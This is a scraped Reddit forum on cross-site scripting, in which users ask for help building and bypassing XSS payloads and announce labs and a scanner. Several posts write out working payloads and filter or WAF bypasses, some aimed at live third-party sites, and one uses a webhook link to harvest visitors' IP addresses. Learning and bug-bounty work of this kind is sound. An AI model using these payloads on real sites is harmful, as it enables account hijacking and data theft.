/r/xss
Everything about Cross-Site Scripting (XSS)
Cross-Site Scripting vulnerabilities and discussion
Keep your postings legal!
Please properly report your vulnerabilities to the appropriate owner.
Related Subs:
/r/xss
Hello,
I have been confronted with an xss attack. Now I would like to download and investigate the payload. Is this possible and how would I do this?
When I inject xss payloads in a search bar, how can this cause harm for users? Because that way the users would have to search for that payload by themselves and nobody would do this. Or am I missing something?
I understand how it might steal cookies when sent through something like a chat promt to other users. Or what might happen if you can post the xss payload on a public post that other users visit. But not in the search bar?
I am testing the efficiency of OWASP CRS with a fuzz based testing tool GotestWAF where it fuzzes the payload by encoding and it places it in different placeholder such as URLpath , URL param, HTMLform and HTMLmultipart form . However I am having a doubt if xss in URLpath is valid .
I am attempting to create a reflected XSS payload to bypass a filter. The filter replaces spaces with "+".
so a payload like <svg onload=alert(0)&test2>
becomes <svg+onload=alert(0)&test2>
.
To include an ending ">" to close the tag, I use &test2>
, as the filter does not escape ">" when &
precedes it but does escape ">" when it follows =
.
This seems to be because the filter only escapes URL parameter values, such as
?notescaped=(escaped)¬escaped=(escaped)
.
This payload works correctly in an HTML file as:
<svg onload=alert(0)&test2>
Additionally, the /
character is also escaped, preventing the use of a payload like:
<svg/onload=xxxx&test2>
or
<script>alert(0)</script>
I am looking for a way to bypass this filter. Specifically, I am seeking a character that can function like a space or /
in this context.
Hi
How to go about solving this challenge - https://xss.challenge.training.hacq.me/challenges/baby03.php
I am not able to figure it out. Any advise is welcome. Thanks
Can someone suggest me some of the bug bounty platforms. I have a lot of websites which I found vul to different attacks. But they are either govt owned or govt affiliated. Now I want to participate in any better bug bounty pogramm, suggest some.
I need some info about, is there any way we can save xss payload on the server via search field xss vul. Every time I run any payload it reflects changes only on my web browser and server side remains unchanged.
so while testing for xss, if the value is reflected with special characters like double quotes encoded, which encodings to try among the following? are all of the following encodings to be tried one by one?? are some of them testing equals waste of time?
HTML entities:
Hexadecimal "
Decimal "
Named Entity "
Js or JSON Escape sequences:
Javascript escape \"
Octal Js Escape \042
Hexadecimal Js Escape \x22
URL encoding:
Hexadecimal %22
Unicode encoding:
UTF-16 Hexadecimal \u0022
UTF-8 Hexadecimal 0x22
HTML Hexadecimal "
ASCII encoding:
Hexadecimal 0x22
Decimal 34
Binary 00100010
full code on my website would it be possible to use a XSS attack as long as i don't run anything with it on clients side?
document.addEventListener("DOMContentLoaded", function () {
const urlParams = new URLSearchParams(window.location.search);
const affiliateCode = urlParams.get("aff");
if (affiliateCode) {
localStorage.setItem("affiliate_code", affiliateCode);
}
});
whenever I replace redirect url with javascript:alert(1) , browser convert it to unsafe:javascript:alert(1)
How I can bypass?
just came across xss, watched some introductory videos on yt about it, i get the concept and i want to continue pursuing it
like all beginners, it's overwhelming for me and don't know what to do
any lead would help, thanks
I've recently been practicing on portswigger's gin and juice shop test site, https://ginandjuice.shop/ , they have a list of all the vulnerabilities and the paths to them here, https://ginandjuice.shop/vulnerabilities, it says there's a reflected XSS at /catalog/subscribe. I'm assuming this is where on the home page, if you scroll down you can enter a email to subscribe, it then reflects this email on the home page. I can't figure out how to trigger this XSS so if anyone has done it please can you help me out.
What I've tried : I first tried a basic input with <>@gmail.com on the page, but it has basic filtering so that the email input field has to be a real email, no grammar apart from @ and . To bypass this, I intercepted the request of a valid email, e.g. asd@gmail.com, in burpsuite and edited it there to <img src="x" onerror="alert(1)">, this got past the basic filtering and was displayed to the screen but no XSS. After looking through the js I saw that it used .textContent to set it, as to why the XSS didn't trigger but looked correct in the source code. This is as far as I got and I'd appreciate any help.
i'm testing a web application where the = sign is filtered, meaning when i type it in the payload the app url encodes it, if i tried to encode it twice nothing happens except that the app returns the double encoding that i did, same thing for triple encoding. In the case of HTML encoding and i guess any other encoding really what happens is that the app returns the = sign url encoded once also, any ideas of how to bypass this ?, or how can i write a payload that is empty of = signs ?
Hello friends. while working in a vdp program, I realized that I can write an xss code in the username section. However, I cannot run xss codes exactly because there is a max length setting. Is there a chance to bypass the max length and run the xss code? If you have information, I would appreciate it if you share it.
Hey guys I am kinda new to XSS and want to get more into it as i am using it for my thesis.
I know there are labs out there like the ones from BurpSuite, but are there any better ones out there?
For example i would like to show an example of how stealing of session cookie is done and so on.
My approach would have been to setup multiple websites, that are equipped with different security measures, but maybe there is already something out there, that i can use?
I would gladly appreciate in the sharing of your knowledge!
Hi,
I am trying for xss on a website..my payload gets reflected inside "<div title="my\_payload">"..<> are not filtered means not getting convert into "<" and ">"..but double quotes are getting convert into """..so my question is xss is possible there? for getting xss popup i need double quotes to work..without them i can't close the "<div>" tag.
Thanks
I found this payload to be reflected in a form field. the website is protected bu sucuri firewall.
<a%20x%20href=javascript%26%2358%3Bprompt(1)>a</a>
but i can't make the prompt to work. can somebody explain me this ?
thank you.
I'm a beginner trying to learn ethical hacking.
Can someone help me on this?
if i manually enter the payloads into search box able to trigger the xss however , if i pass the payload in parameter like /?s="mypayload" it is getting encoded so unable trigger. Can you suggest how to bypass it ?
if i use CSRF POC and form enctype="text/plain" - my parameter is not searching in target after submitting the button.
javascript:/*--></title></style></textarea></script></xmp>
<svg/onload='+/"`/+/onmouseover=1/+/[*/[]/+alert(42);//'>
Thanks
We covered brief introduction to both types of cross site scripting vulnerability (XSS), reflected & stored xss, and demonstrated a practical scenario showcasing intercepting HTTP requests and modifying request headers and other form parameters to include XSS payloads that when injected and stored in the target website database will lead to the transfer of the user's cookies to the attacker everytime the user visits the vulnerable page.
How does one go about doing these exercises.?
I can see my input is going into a div tag what next steps do take?>
Hi,
I am new to bug hunting and very much noob in xss too. I was trying for stored xss in comment section of a website..later i got to know its using markdown. then i tried some payloads..check below i have write payload with its response on website:-
![a](onerror=confirm(1))
-----> <img alt="a" src="onerror=confirm(1)">
![a](x"onerror=confirm(1))
-----> <img alt="a" src="x"onerror=confirm(1)">
the i used  
for space..it worked.
![aa](x" onerror=confirm(1))
-----> <img alt="a" src="x" onerror=confirm(1)">
then i tried "
for double quotes..it didn't worked.
![aa](x" onerror="confirm(1))
-----> <img alt="aa" src="x" onerror="confirm(1)">
i need only x"
and onerror="
's double quotes to work..it quite surpise for me (i am totally noob) that for space  
worked and for double quotes "
didn' worked.
any help? how to trigger xss popup here? i tried such payloads <img src=x onerror=confirm(1)>
but <>
are converting into < >
but double quotes are not..also <img src=x onerror=confirm(1)>
creates seperate <span>
tag on website..response is something like this <span><img src=x onerror=confirm(1)></span>
.
URL encoding doesn't work.
also i can get ip address of any user using this payload ![a](https://webhook.site/aa)
i will report it if i didn't get xss. if you guys have any other suggestion for any other bug please comment.
once again i am saying i am totally noob so please don't troll.
thanks
Working on a pretty interesting XSS right now, I think I have my final payload but just for fun I'm wondering if anyone has any suggestions for shorter/less complicated ways to pop an alert here.
Current payload:
<img src=x onerror="constructor.constructor%0a(window['%5Cx53tring']['from%5Cx43har%5Cx43ode'](97,108,101,114,116,40,41))()">
We're injecting into a URL context so that comes with some interesting implications:
We're also injecting into an innerHTML sink so anything that gets executed synchronously like script tags to call resources from an origin we control are also out of the question. I found that using white space characters in between a function and its parameter declaration prevented the WAF from triggering (i.e. alert(1) wont work but alert%0a(1) will)
My knowledge of esoteric JS stops me here :(, so I was curious to see what others might come up with.
Edit:
We can pop an alert with the following payload:
<img src=x onerror=“alert%0a()”>
But I would like to keep using String.fromCharCode() or similar as that prevents us from having to tailor longer payloads to not trigger the WAF.
Hey r/xss
I want to share a simple yet effective script to scan a list of URLs for reflected XSS vulnerabilities. This tool uses custom payloads, supports HTTP/2, and rotates User-Agent strings to reduce detection.
Features:
Additional Capabilities: You can also modify the payload to detect other vulnerabilities like SQL injection.
Check out the full details and get the script on GitHub
https://github.com/ManShum812/ReflectedXSS-Finder
I’d love to get your feedback, and if you find it helpful, please give it a star on GitHub!
The web page reflects back the value of the User-Agent header in a JavaScript string context. You can "exploit" it by intercepting a request in your proxy of choice and changing your User-Agent header to something like '-alert()-'
, but as far as I know, you can't force a victim's browser to change the User-Agent header on a page that it will render.
You can change the User-Agent header value in request made using XMLHttpRequest()
and fetch()
(as long as you aren't using Chrome/Chromium), but as far as I know, there's no way to make a victim's browser render them in the context of that domain.
A mock up of the potentially vulnerable page is here: https://kprthsuw6achwemqowqus2uwge0wbwoe.lambda-url.us-east-1.on.aws/
I'd love to know whether someone finds a way to exploit this
I put together a lab for a technique that used to work, but it appears it's not exploitable in modern browsers.
The idea is that an endpoint expects JSON data, so it should only be accessible either same-origin, or explicitly allowed by CORS. However, the endpoint doesn't verify the MIME type. So it's possible to craft a cross domain form, something like:
<input type="hidden" name="{"foo":"bar" value=""}">
And this would create body content like this:
{"foo":"bar="}
Which could get through a JSON parser! However, it appears that Chrome now URL encodes some of these characters, so I think it is non-exploitable now.
(Just realised the title is a little confusing: form POSTs have always been URL encoded, but Chrome has extended the set of characters that get encoded)
This lab reflects the raw URL parameter. If you send a direct request using Zap or similar, it reflects < and >. However, if you try to exploit in Chrome, the browser URL-encodes the payload, making it non-exploitable. Is there a way to exploit this in a modern browser?
I've built a site to help people learn & collaborate on xss: XSSy
There are a number of labs there already ranging from easy to very hard.
It has a headless browser to verify payloads and successful submitters go on the hall of fame.
It also has a feature I've not seen elsewhere: you can create and share your own labs. I though this would be particularly useful if you encounter an unusual XSS scenario and wanted to crowd source solutions.
Please, give it a go, and tell your friends. And feel free to feed back to me any issues, feature requests, etc. Happy XSSing!
Hey There everyone!
I am new here! I would like to ask did you guys manage to solve the xss assessment? because I’ve been trying for a full day now with no real progress!
Thanks in advance
i found xss vulnerability from scannner but the thing is that i am not able to exploit it can guys anyone help me to do that i really appreciate that.
https://www.spaceship.com/domains"sTYLe='zzz:Expre%2F**%2FSSion(RFVu(9253))'bad="/cctld/io/ 4